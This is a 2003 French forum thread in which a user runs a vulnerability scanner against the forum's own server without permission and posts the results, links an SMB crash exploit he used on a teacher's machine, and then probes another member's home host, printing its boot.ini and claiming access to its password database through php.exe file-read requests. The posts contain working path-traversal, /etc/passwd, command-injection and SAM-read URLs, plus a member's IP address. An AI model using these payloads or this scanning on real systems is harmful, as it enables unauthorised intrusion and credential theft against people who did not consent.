la sécurité , vous connaissez ?

la sécurité , vous connaissez ? - Débats - Linux et OS Alternatifs

Marsh Posté le 25-04-2003 à 22:19:16    

si je vous dits :
 
n-stealth,
sniffer pro (nai),
smbdie,
nmap (wincap),
superscan ....
 
sur hfr c pas bo a voir les resultats ...
 


---------------
FFFF
Reply

Marsh Posté le 25-04-2003 à 22:19:16   

Reply

Marsh Posté le 25-04-2003 à 22:32:07    

t'as scanné hfr :o
 
et ac donne quoi ? c'est une passoire ?


---------------
-= In Kik00 101 I trust :o =-
Reply

Marsh Posté le 25-04-2003 à 22:36:27    

HuGoBioS a écrit :

t'as scanné hfr :o
 
et ac donne quoi ? c'est une passoire ?


 
j'ai pas fait du scann agressif (on est pas la pour nuire), du light .... (avec bascule de port et tempo. à 5s pour les IDS de base):
 
Scanning : Normal  
 
212.43.221.155  
Nom d'hôte: s10.tgv.net
Port: 80
Serveur: Apache/1.3.27 (Unix) PHP/4.1.2
 
Le serveur peut avoir des vulnérabilités de CGI. 37 item(s)  
 
?WP-CS-DUMP Test  
Niveau du Risque: Moyen
Emplacement: http://212.43.221.155/?wp-cs-dump
 
Common Netscape Enterprise Vulnerability/Exposure - False positives are known for this item.
 
 
?WP-VERIFY-LINK Test  
Niveau du Risque: Moyen
Emplacement: http://212.43.221.155/?wp-verify-link
 
Common Netscape Enterprise Vulnerability/Exposure - False positives are known for this item.
 
 
ART Test  
Niveau du Risque: Moyen
Emplacement: http://212.43.221.155/art
 
Common Vulnerability/Exposure.
 
 
HTML Test  
Niveau du Risque: Moyen
Emplacement: http://212.43.221.155/html
 
Common Vulnerability/Exposure.
 
 
?PAGESERVICES Test  
Niveau du Risque: Moyen
Emplacement: http://212.43.221.155/html/?PageServices
 
Common Vulnerability/Exposure.
 
 
IMAGES Test  
Niveau du Risque: Moyen
Emplacement: http://212.43.221.155/images
 
Common Vulnerability/Exposure.
 
 
#1099  
Niveau du Risque: Moyen
Emplacement: http://212.43.221.155/images/?cwd=../../../../
 
Common Vulnerability/Exposure.
 
 
#1100  
Niveau du Risque: Moyen
Emplacement: http://212.43.221.155/images/?cwd=/
 
Common Vulnerability/Exposure.
 
 
NEWS Test  
Niveau du Risque: Moyen
Emplacement: http://212.43.221.155/news
 
Common Vulnerability/Exposure.
 
 
ROBOTS Test  
Niveau du Risque: Moyen
Emplacement: http://212.43.221.155/robots.txt
 
Common Vulnerability/Exposure.
 
 
TEMP Test  
Niveau du Risque: Moyen
Emplacement: http://212.43.221.155/temp
 
Common Vulnerability/Exposure.
 
 
#2227  
Niveau du Risque: Moyen
Emplacement: http://ms_proxy_auth_query/
 
Common Vulnerability/Exposure.
 
 
CGI Test  
Niveau du Risque: Petit
Emplacement: http://212.43.221.155/cgi
 
Common Directory Checking Test. Tip from the SANS/FBI Top 20 - Configure your web server to use CGI alerting scripts for Error Responses. WebAdmins need to keep tabs on all of these security related issues with their web servers. To assist with this monitoring, the web server should be configured to use custom CGI error response pages for server response codes 401, 403, 413 and 500. The error pages are PERL CGI scripts that are initiated every time the server issues either of these response codes. These scripts accomplish many important tasks including issuing an html warning banner to the client and immediately sending an e-mail notification to the WebAdmin. The e-mail message automates the process of manually collecting security related session information from the web server access and error logs for the request.
 
 
HTML Test  
Niveau du Risque: Petit
Emplacement: http://212.43.221.155/html
 
Common File/Directory Exposure - Possible misconfiguration problem in the web server that allow unauthorized remote users to steal confidential documents or gain information about the web server's host machine.
 
 
IMAGES Test  
Niveau du Risque: Petit
Emplacement: http://212.43.221.155/images
 
Common File/Directory Exposure - Possible misconfiguration problem in the web server that allow unauthorized remote users to steal confidential documents or gain information about the web server's host machine.
 
 
NEWS Test  
Niveau du Risque: Petit
Emplacement: http://212.43.221.155/news
 
Common File/Directory Exposure - Possible misconfiguration problem in the web server that allow unauthorized remote users to steal confidential documents or gain information about the web server's host machine.
 
 
TEMP Test  
Niveau du Risque: Petit
Emplacement: http://212.43.221.155/temp
 
Common File/Directory Exposure - Possible misconfiguration problem in the web server that allow unauthorized remote users to steal confidential documents or gain information about the web server's host machine.
 
 
TESTS Test  
Niveau du Risque: Petit
Emplacement: http://212.43.221.155/tests
 
Common File/Directory Exposure - Possible misconfiguration problem in the web server that allow unauthorized remote users to steal confidential documents or gain information about the web server's host machine.
 
 
#7074  
Niveau du Risque: Grand
Emplacement: http://212.43.221.155//
 
Common HTTP Vulnerability/Exposure - Possible bug or misconfiguration problem in the web server that allow unauthorized remote users to gain information about the web server's host machine that will allow them to break into the system. False positives are known for this item.
 
 
Special Request  
Niveau du Risque: Moyen
Emplacement: http://212.43.221.155/index.php?ac [...] platecache[faq]=hello+world
 
Common PHP Vulnerability/Exposure - Some versions or configurations of this item have known security problems.
 
 
Special Request  
Niveau du Risque: Moyen
Emplacement: http://212.43.221.155/index.php?ca [...] script>
 
Common PHP Vulnerability/Exposure - Some versions or configurations of this item have known security problems.
 
 
Special Request  
Niveau du Risque: Moyen
Emplacement: http://212.43.221.155/index.php?ch [...] .%2F%2Fetc
 
Common PHP Vulnerability/Exposure - Some versions or configurations of this item have known security problems.
 
 
Special Request  
Niveau du Risque: Moyen
Emplacement: http://212.43.221.155/index.php?ch [...] .%2F%2Fetc
 
Common PHP Vulnerability/Exposure - Some versions or configurations of this item have known security problems.
 
 
Special Request  
Niveau du Risque: Moyen
Emplacement: http://212.43.221.155/index.php?fi [...] d=ls%20-al
 
Common PHP Vulnerability/Exposure - Some versions or configurations of this item have known security problems.
 
 
INDEX?FILE=INDEX Test  
Niveau du Risque: Moyen
Emplacement: http://212.43.221.155/index.php?file=index.php
 
Common PHP Vulnerability/Exposure - Some versions or configurations of this item have known security problems.
 
 
INDEX Test  
Niveau du Risque: Moyen
Emplacement: http://212.43.221.155/index.php?includedir=test
 
Common PHP Vulnerability/Exposure - Some versions or configurations of this item have known security problems.
 
 
PASSWD Test  
Niveau du Risque: Moyen
Emplacement: http://212.43.221.155/index.php?l=../../../etc/passwd
 
Common PHP Vulnerability/Exposure - Some versions or configurations of this item have known security problems.
 
 
Special Request  
Niveau du Risque: Moyen
Emplacement: http://212.43.221.155/index.php?l= [...] etc/passwd
 
Common PHP Vulnerability/Exposure - Some versions or configurations of this item have known security problems.
 
 
Special Request  
Niveau du Risque: Moyen
Emplacement: http://212.43.221.155/index.php?pa [...] etc/passwd
 
Common PHP Vulnerability/Exposure - Some versions or configurations of this item have known security problems.
 
 
Special Request  
Niveau du Risque: Moyen
Emplacement: http://212.43.221.155/index.php?pa [...] etc/passwd
 
Common PHP Vulnerability/Exposure - Some versions or configurations of this item have known security problems.
 
 
Special Request  
Niveau du Risque: Moyen
Emplacement: http://212.43.221.155/index.php?pa [...] r.com/file
 
Common PHP Vulnerability/Exposure - Some versions or configurations of this item have known security problems.
 
 
Special Request  
Niveau du Risque: Moyen
Emplacement: http://212.43.221.155/index.php?pg [...] adfile.php
 
Common PHP Vulnerability/Exposure - Some versions or configurations of this item have known security problems.
 
 
Special Request  
Niveau du Risque: Moyen
Emplacement: http://212.43.221.155/index.php?pi [...] _name=path
 
Common PHP Vulnerability/Exposure - Some versions or configurations of this item have known security problems.
 
 
Special Request  
Niveau du Risque: Moyen
Emplacement: http://212.43.221.155/index.php?pi [...] stant-path
 
Common PHP Vulnerability/Exposure - Some versions or configurations of this item have known security problems.
 
 
INDEX Test  
Niveau du Risque: Moyen
Emplacement: http://212.43.221.155/index.php?pymembs=admin
 
Common PHP Vulnerability/Exposure - Some versions or configurations of this item have known security problems.
 
 
INDEX Test  
Niveau du Risque: Moyen
Emplacement: http://212.43.221.155/index.php?sql_debug=1
 
Common PHP Vulnerability/Exposure - Some versions or configurations of this item have known security problems.
 
 
Special Request  
Niveau du Risque: Moyen
Emplacement: http://212.43.221.155/index.php?to [...] script>
 
Common PHP Vulnerability/Exposure - Some versions or configurations of this item have known security problems.  


---------------
FFFF
Reply

Marsh Posté le 25-04-2003 à 22:39:53    

houlà ca en fait bcp la qd meme !


---------------
-= In Kik00 101 I trust :o =-
Reply

Marsh Posté le 25-04-2003 à 22:44:53    

HuGoBioS a écrit :

houlà ca en fait bcp la qd meme !


 
..pas mal de php , mais ca, ca ne m'etonne pas !!!!
les dev. se foutent souvent de la sécu ... d'ou des tonnes de failles en sql injection ou php ...
 
Par contre j'ai testé smbdie sur du win2K : C FATALE !!!
 
en clair tu injectes une trame SMB avec 2 flags ... et tu vois ton serveur Ad (toute version !!! et SP3 aussi) te faire un beau BLUE Screen !! (avec videage memoire ..dump etc ...)
 
C delire a voir car ca tue le serveur en 2 sec !!!


---------------
FFFF
Reply

Marsh Posté le 25-04-2003 à 22:46:42    

jamiroq a écrit :


 
..pas mal de php , mais ca, ca ne m'etonne pas !!!!
les dev. se foutent souvent de la sécu ... d'ou des tonnes de failles en sql injection ou php ...
 
Par contre j'ai testé smbdie sur du win2K : C FATALE !!!
 
en clair tu injectes une trame SMB avec 2 flags ... et tu vois ton serveur Ad (toute version !!! et SP3 aussi) te faire un beau BLUE Screen !! (avec videage memoire ..dump etc ...)
 
C delire a voir car ca tue le serveur en 2 sec !!!

tu peux detailler ? trame smb avec deux flags ca me parle pas trop ... (je m'interesse a la secu depuis peu donc il me manque du vocabulaire lol)


---------------
-= In Kik00 101 I trust :o =-
Reply

Marsh Posté le 25-04-2003 à 22:54:02    

HuGoBioS a écrit :

tu peux detailler ? trame smb avec deux flags ca me parle pas trop ... (je m'interesse a la secu depuis peu donc il me manque du vocabulaire lol)
 


sorry pour les terme (c vraiment pas mon style d'enfumer avec des termes ..surtout que le principe est simple : j'allais juste au plus cours :d)
 
voici l'exploit et l'outils pour faire mumuse ...fais gaffe c pas un jouet, ca reboot le serveur sans la moindre autorisation  du tout !!
 
: http://www.securityfocus.com/bid/5556/discussion/
  http://www.securityfocus.com/bid/5556/exploit/
 
si tu veux l'outils (.exe) qui exploite la faille tu vas sur l'onglet "exploit" en bas ....
 
bon je vais dodo ma formation MCSE win2k m'a tué la tete aujourdh'ui A++
 
NB : ca torpille un serveur en SP3 (testé en cours sur le prof ... :d)


Message édité par jamiroq le 25-04-2003 à 22:57:14

---------------
FFFF
Reply

Marsh Posté le 25-04-2003 à 22:59:23    

jamiroq a écrit :


sorry pour les terme (c vraiment pas mon style d'enfumer avec des termes ..surtout que le principe est simple : j'allais juste au plus cours :d)
 
voici l'exploit et l'outils pour faire mumuse ...fais gaffe c pas un jouet, ca reboot le serveur sans la moindre autorisation  du tout !!
 
: http://www.securityfocus.com/bid/5556/discussion/
  http://www.securityfocus.com/bid/5556/exploit/
 
si tu veux l'outils (.exe) qui exploite la faille tu vas sur l'onglet "exploit" en bas ....
 
bon je vais dodo ma formation MCSE win2k m'a tué la tete aujourdh'ui A++
 
NB : ca torpille un serveur en SP3 (testé en cours sur le prof ... :d)

lol oky
je t'accusais pas de verbiage ;-)
et t'inkiete j'aime pas faire planter les machines ... !
bonne soirée


---------------
-= In Kik00 101 I trust :o =-
Reply

Marsh Posté le 26-04-2003 à 13:20:23    

jamiroq a écrit :


sorry pour les terme (c vraiment pas mon style d'enfumer avec des termes ..surtout que le principe est simple : j'allais juste au plus cours :d)
 
voici l'exploit et l'outils pour faire mumuse ...fais gaffe c pas un jouet, ca reboot le serveur sans la moindre autorisation  du tout !!
 
: http://www.securityfocus.com/bid/5556/discussion/
  http://www.securityfocus.com/bid/5556/exploit/
 
si tu veux l'outils (.exe) qui exploite la faille tu vas sur l'onglet "exploit" en bas ....
 
bon je vais dodo ma formation MCSE win2k m'a tué la tete aujourdh'ui A++
 
NB : ca torpille un serveur en SP3 (testé en cours sur le prof ... :d)


J'ai beau essayer ca marche pas : pourtant l'ordi sur lequel j'essaye est un W2Ksp3

Reply

Marsh Posté le 26-04-2003 à 13:41:21    

il est surement patché (windows update je pense) ou alors tu ne peux pas faire la résolution de noms netbios
 
jamiroq => quel scanner te donne un rapport si détaillé (ça m'interesse si ça tourne pas sous win)?


Message édité par nikosaka le 26-04-2003 à 13:42:10
Reply

Marsh Posté le 26-04-2003 à 13:41:21   

Reply

Marsh Posté le 26-04-2003 à 13:43:28    

nikosaka a écrit :

il est surement patché (windows update je pense) ou alors tu ne peux pas faire la résolution de noms netbios
 
jamiroq => quel scanner te donne un rapport si détaillé (ça m'interesse si ça tourne pas sous win)?


a part le sp3 y a aucun patch (je l'ai installé) par contre le pb vien de netbios : session refused !?

Reply

Marsh Posté le 26-04-2003 à 14:57:07    

nikosaka a écrit :

il est surement patché (windows update je pense) ou alors tu ne peux pas faire la résolution de noms netbios
 
jamiroq => quel scanner te donne un rapport si détaillé (ça m'interesse si ça tourne pas sous win)?


 :( , c sous win n-stealth ... mais bon c pas le plus costaud crois moi ...
 
c clair que c une exploit ipc$ et smb donc .. tu coupe le partage de fichier donc le port 137 à 139 ... cfini plus de paquet smb corrompu ..


---------------
FFFF
Reply

Marsh Posté le 26-04-2003 à 14:58:19    

DesuetCR_B a écrit :


a part le sp3 y a aucun patch (je l'ai installé) par contre le pb vien de netbios : session refused !?


files moi ton  ip ?


---------------
FFFF
Reply

Marsh Posté le 26-04-2003 à 16:32:18    

jamiroq a écrit :


files moi ton  ip ?


g pas essayé sur ce pc, mais si tu veux faire des test :
popoboueb.dyndns.org, en plus y a pas de firewall

Reply

Marsh Posté le 26-04-2003 à 16:37:12    

c po bien te scanner hfr c interdit :D


---------------
:: Light is Right ::
Reply

Marsh Posté le 26-04-2003 à 16:50:38    

tomate77 a écrit :

c po bien te scanner hfr c interdit :D


je sais, et ca je m'en excuse, mais c pas du scan agressif, c du scan de test avec des intervalles de 5s (pour eviter les IDS).
 
edit : c clair que je vais pas surcharger le serveur a vec des test a la con.evidement.


Message édité par jamiroq le 26-04-2003 à 16:53:07

---------------
FFFF
Reply

Marsh Posté le 26-04-2003 à 17:53:20    

DesuetCR_B a écrit :


g pas essayé sur ce pc, mais si tu veux faire des test :
popoboueb.dyndns.org, en plus y a pas de firewall


 
allez, on va commencer soft, voici ton boot.ini mon cher :
 
[boot loader] timeout=0 default=multi(0)disk(0)rdisk(0)partition(1)\WINNT [operating systems] multi(0)disk(0)rdisk(0)partition(1)\WINNT="Microsoft Windows 2000 Server" /fastdetect multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professionnel" /fastdetect  
 
....
 
edit : fais gaffe on a accés a ta SAM !!!!! (tt les mot de passes locaux de tes windows !!)


Message édité par jamiroq le 26-04-2003 à 17:55:05

---------------
FFFF
Reply

Marsh Posté le 26-04-2003 à 18:10:59    

jamiroq a écrit :


 
allez, on va commencer soft, voici ton boot.ini mon cher :
 
[boot loader] timeout=0 default=multi(0)disk(0)rdisk(0)partition(1)\WINNT [operating systems] multi(0)disk(0)rdisk(0)partition(1)\WINNT="Microsoft Windows 2000 Server" /fastdetect multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professionnel" /fastdetect  
 
....
 
edit : fais gaffe on a accés a ta SAM !!!!! (tt les mot de passes locaux de tes windows !!)


 
c dingue ça  :??:  par où tu passes pour voir ça !
tu connais pas autrement un scanner linux avec un rapport des possibles failles et bug (surtout pour apache et php)

Reply

Marsh Posté le 26-04-2003 à 18:18:54    

jamiroq a écrit :


je sais, et ca je m'en excuse, mais c pas du scan agressif, c du scan de test avec des intervalles de 5s (pour eviter les IDS).
 
edit : c clair que je vais pas surcharger le serveur a vec des test a la con.evidement.


oue mais le scan est interdit tout simplement :D


---------------
:: Light is Right ::
Reply

Marsh Posté le 26-04-2003 à 18:30:38    

nikosaka a écrit :


 
c dingue ça  :??:  par où tu passes pour voir ça !
tu connais pas autrement un scanner linux avec un rapport des possibles failles et bug (surtout pour apache et php)


 
nmap est sympa,
ethereal pour de l'ecoute locale de trame ... avec ca tu casses par ex. les password outolook ...


---------------
FFFF
Reply

Marsh Posté le 26-04-2003 à 18:31:25    

jamiroq a écrit :


 
nmap est sympa,
ethereal pour de l'ecoute locale de trame ... avec ca tu casses par ex. les password outolook ...


t es rentre sur kel port jamiroq ??? :whistle:


---------------
:: Light is Right ::
Reply

Marsh Posté le 26-04-2003 à 18:33:50    

tomate77 a écrit :


oue mais le scan est interdit tout simplement :D


ah bon ?


---------------
FFFF
Reply

Marsh Posté le 26-04-2003 à 18:35:26    

tomate77 a écrit :


oue mais le scan est interdit tout simplement :D


oui bien sur, mais pour voir le boot.ini à distance sans passer par netbios c'est ni ethereal ni nmap qui me donner des infos aussi précise. par quel port tu est passé, moi j'ai trouvé ça :  
21/tcp     open        ftp
25/tcp     open        smtp
80/tcp     open        http
119/tcp    open        nntp
135/tcp    open        loc-srv
389/tcp    open        ldap
563/tcp    open        snews
1002/tcp   open        unknown
1025/tcp   open        NFS-or-IIS
1080/tcp   open        socks
1720/tcp   open        H.323/Q.931
3306/tcp   open        mysql
3372/tcp   open        msdtc
3389/tcp   open        ms-term-serv
5800/tcp   open        vnc-http
5900/tcp   open        vnc

Reply

Marsh Posté le 26-04-2003 à 18:36:33    


+1
pour l'instant le scan est encore autoriser il me semble

Reply

Marsh Posté le 26-04-2003 à 18:40:02    

nikosaka a écrit :


+1
pour l'instant le scan est encore autoriser il me semble


bah scan moi et j envoie les logs a mon fai (ou le tien) et on vera ce k il se passera ;)
 
en gros, c est un bon motif pour couper ta connexion :/


---------------
:: Light is Right ::
Reply

Marsh Posté le 26-04-2003 à 18:41:16    

tomate77 a écrit :


bah scan moi et j envoie les logs a mon fai (ou le tien) et on vera ce k il se passera ;)
 
en gros, c est un bon motif pour couper ta connexion :/


En general si c pas mechant y a juste rappel a l'ordre, si t'as tout detruit la ca devien different

Reply

Marsh Posté le 26-04-2003 à 18:41:33    

tomate77 a écrit :


t es rentre sur kel port jamiroq ??? :whistle:  


bon primo : je voudrais pas passer pour ce que je ne suis pas , cad un pro du hack ; je suis un utilisateur de faille (ayant une certaine connaissance de la secu .. un peu) ... les mecs qui trouvent les failles, c eux les respectables !!! soyons clair.
 
secondo: je ne rentre jamais par un port en force , les IDS verrouille illico l'IP qui fait du scan ... il faut scanné sur 2 a 3 heures pour balayer une seule IP proprement on dira !!
 
la popo ca fait depuis 3 heures que je l'observe .... :d (ps je te rassures je ne touche rien !!! mais bon sang met un firewall sur tes machines ...)


---------------
FFFF
Reply

Marsh Posté le 26-04-2003 à 18:43:58    

jamiroq a écrit :


bon primo : je voudrais pas passer pour ce que je ne suis pas , cad un pro du hack ; je suis un utilisateur de faille (ayant une certaine connaissance de la secu .. un peu) ... les mecs qui trouvent les failles, c eux les respectables !!! soyons clair.
 
secondo: je ne rentre jamais par un port en force , les IDS verrouille illico l'IP qui fait du scan ... il faut scanné sur 2 a 3 heures pour balayer une seule IP proprement on dira !!
 
la popo ca fait depuis 3 heures que je l'observe .... :d (ps je te rassures je ne touche rien !!! mais bon sang met un firewall sur tes machines ...)


 
me ca ne nous dit tjs po par ou t es rentre tout ca [:meganne]
 
 
 
 :whistle:


---------------
:: Light is Right ::
Reply

Marsh Posté le 26-04-2003 à 18:47:49    

jamiroq a écrit :


bon primo : je voudrais pas passer pour ce que je ne suis pas , cad un pro du hack ; je suis un utilisateur de faille (ayant une certaine connaissance de la secu .. un peu) ... les mecs qui trouvent les failles, c eux les respectables !!! soyons clair.
 
secondo: je ne rentre jamais par un port en force , les IDS verrouille illico l'IP qui fait du scan ... il faut scanné sur 2 a 3 heures pour balayer une seule IP proprement on dira !!
 
la popo ca fait depuis 3 heures que je l'observe .... :d (ps je te rassures je ne touche rien !!! mais bon sang met un firewall sur tes machines ...)


J'aimerai bien savoir par ou tu passe.
Qd j'aurai un peu plus de tps j'etudierai mes log.
 
Pour le firewall g pas encore trouvé chaussette a mon pied

Reply

Marsh Posté le 26-04-2003 à 18:48:55    

DesuetCR_B a écrit :


J'aimerai bien savoir par ou tu passe.
Qd j'aurai un peu plus de tps j'etudierai mes log.
 
Pour le firewall g pas encore trouvé chaussette a mon pied


tu vas surement trouver pas mal de chose venant de moi  :whistle:


---------------
:: Light is Right ::
Reply

Marsh Posté le 26-04-2003 à 18:49:49    

tomate77 a écrit :


tu vas surement trouver pas mal de chose venant de moi  :whistle:  


tant k'il y a pas de degat g rien contre

Reply

Marsh Posté le 26-04-2003 à 18:52:49    

ben je passe par ou c ouvert ..... tout le temps ouvert d'ailleurs  :lol:  :lol:  :lol:  :lol:  
 
21, 80, 443 ..... et leur autres petit copain !!
 
bon j'arretes de te scrutez mais patch , c un conseil !!!
 
217.128.133.46  
Nom d'hôte: AStrasbourg-102-1-1-46.abo.wanadoo.fr
Port: 80
Serveur: Apache/2.0.43 (Win32)
 
Le serveur peut avoir des vulnérabilités de CGI. 8 item(s)  
 
_VTI_INF Test  
Niveau du Risque: Moyen
Emplacement: http://217.128.133.46/_vti_inf.html
 
Common Vulnerability/Exposure.
 
 
PHP Test  
Niveau du Risque: Moyen
Emplacement: http://217.128.133.46/php/php.exe
 
Common Vulnerability/Exposure.
 
 
Special Request  
Niveau du Risque: Moyen
Emplacement: http://217.128.133.46/php/php.exe? [...] access.log
 
Common Vulnerability/Exposure.
 
 
BOOT Test  
Niveau du Risque: Moyen
Emplacement: http://217.128.133.46/php/php.exe?c:boot.ini
 
Common Vulnerability/Exposure.
 
 
SAM Test  
Niveau du Risque: Moyen
Emplacement: http://217.128.133.46/php/php.exe?c:winntrepairsam
 
Common Vulnerability/Exposure.
 
 
SAM Test  
Niveau du Risque: Moyen
Emplacement: http://217.128.133.46/php/php.exe?d:winntrepairsam
 
Common Vulnerability/Exposure.
 
 
POSTINFO Test  
Niveau du Risque: Moyen
Emplacement: http://217.128.133.46/postinfo.html
 
Common Vulnerability/Exposure.
 
 
TEST Test  
Niveau du Risque: Moyen
Emplacement: http://217.128.133.46/test.htm
 
Common Vulnerability/Exposure.
 


---------------
FFFF
Reply

Marsh Posté le 26-04-2003 à 18:55:31    

jamiroq a écrit :

ben je passe par ou c ouvert ..... tout le temps ouvert d'ailleurs  :lol:  :lol:  :lol:  :lol:  
 
21, 80, 443 ..... et leur autres petit copain !!
 
bon j'arretes de te scrutez mais patch , c un conseil !!!
 
217.128.133.46  
Nom d'hôte: AStrasbourg-102-1-1-46.abo.wanadoo.fr
Port: 80
Serveur: Apache/2.0.43 (Win32)
 
Le serveur peut avoir des vulnérabilités de CGI. 8 item(s)  
 
_VTI_INF Test  
Niveau du Risque: Moyen
Emplacement: http://217.128.133.46/_vti_inf.html
 
Common Vulnerability/Exposure.
 
 
PHP Test  
Niveau du Risque: Moyen
Emplacement: http://217.128.133.46/php/php.exe
 
Common Vulnerability/Exposure.
 
 
Special Request  
Niveau du Risque: Moyen
Emplacement: http://217.128.133.46/php/php.exe? [...] access.log
 
Common Vulnerability/Exposure.
 
 
BOOT Test  
Niveau du Risque: Moyen
Emplacement: http://217.128.133.46/php/php.exe?c:boot.ini
 
Common Vulnerability/Exposure.
 
 
SAM Test  
Niveau du Risque: Moyen
Emplacement: http://217.128.133.46/php/php.exe?c:winntrepairsam
 
Common Vulnerability/Exposure.
 
 
SAM Test  
Niveau du Risque: Moyen
Emplacement: http://217.128.133.46/php/php.exe?d:winntrepairsam
 
Common Vulnerability/Exposure.
 
 
POSTINFO Test  
Niveau du Risque: Moyen
Emplacement: http://217.128.133.46/postinfo.html
 
Common Vulnerability/Exposure.
 
 
TEST Test  
Niveau du Risque: Moyen
Emplacement: http://217.128.133.46/test.htm
 
Common Vulnerability/Exposure.
 
 


21 et 80 g pas le choix
 
443 skoi ?

Reply

Marsh Posté le 26-04-2003 à 18:57:57    

si y'en a que ca amuse ....
 
voila mon ip du jour : 80.13.13.96
(c light comme protect mais suffisant contre pas mal d'attaque)
 
perso je bloque tout et fait du stateful pour mes sorties sur le web .... avec qq regles style antispoof, christmas tree, ip_frag ... rien de bien costaud.


---------------
FFFF
Reply

Marsh Posté le 26-04-2003 à 18:59:41    

DesuetCR_B a écrit :


21 et 80 g pas le choix
 
443 skoi ?


 
fait tourner ton ip DesuetCR_B ( tu reconnect ta connexion) car ton ip est visible, merci.
 
443 : https.(y'a parfois des failles sur certains moteur transactionnel "securisé" )


---------------
FFFF
Reply

Marsh Posté le 26-04-2003 à 19:03:22    

:ouch: hallucinant!
 
T'as un site qui explique tout ça clairement (en français pas trop technique avec exemples pratiques  :D )
 
J'ai confiance dans mon firewall, mais il va quand même falloir que j'approfondisse...


---------------
Gitan des temps modernes
Reply

Marsh Posté le 26-04-2003 à 19:03:35    

ok jamiroq, t as un scanner de failles petit malin :D
 
c est kler k il fo k il patch ET firewall tout ca !!
 
pour son ip c trop tard, il a file son nom dns dyndns :D


---------------
:: Light is Right ::
Reply

Marsh Posté le 26-04-2003 à 19:09:38    

Special Request  
Niveau du Risque: Moyen
Emplacement: http://217.128.133.46/php/php.exe? [...] access.log
 
Common Vulnerability/Exposure.
 
c ma preferée celle là ...  
 
 
C'est kler que les scanners de faille c'est assez terrible pour voir les  .. failel sd'une machine !!


---------------
-= In Kik00 101 I trust :o =-
Reply

Marsh Posté le 26-04-2003 à 19:09:43    

Bobor a écrit :

:ouch: hallucinant!
 
T'as un site qui explique tout ça clairement (en français pas trop technique avec exemples pratiques  :D )
 
J'ai confiance dans mon firewall, mais il va quand même falloir que j'approfondisse...


 
pour peter un firewall deux methodes (les grdes lignes) :
 
1 - un firewall c un mur , ok ,
2 - un mur avec des petit trous ouverts ... ok,
 
Donc :
 
soit on passe par les petits trous ouverts , la meme ou se trouve le site web, ftp , http etc ... (c les failles de ces composant qui permettent de passer !!) ou alors on utilise les troyans ..ca c deja bcp moins elegants !!!
 
soit on essaie de casse le firewall lui meme alors on attaque l'os lui meme qui le fait tourner !! (une pile IP ca se casse .... facilement sur certains os ..)


---------------
FFFF
Reply

Marsh Posté le 26-04-2003 à 19:10:03    

tomate77 a écrit :

ok jamiroq, t as un scanner de failles petit malin :D
 
c est kler k il fo k il patch ET firewall tout ca !!
 
pour son ip c trop tard, il a file son nom dns dyndns :D


shitt !!


---------------
FFFF
Reply

Marsh Posté le    

Reply

Sujets relatifs:

Leave a Replay

Make sure you enter the(*)required information where indicate.HTML code is not allowed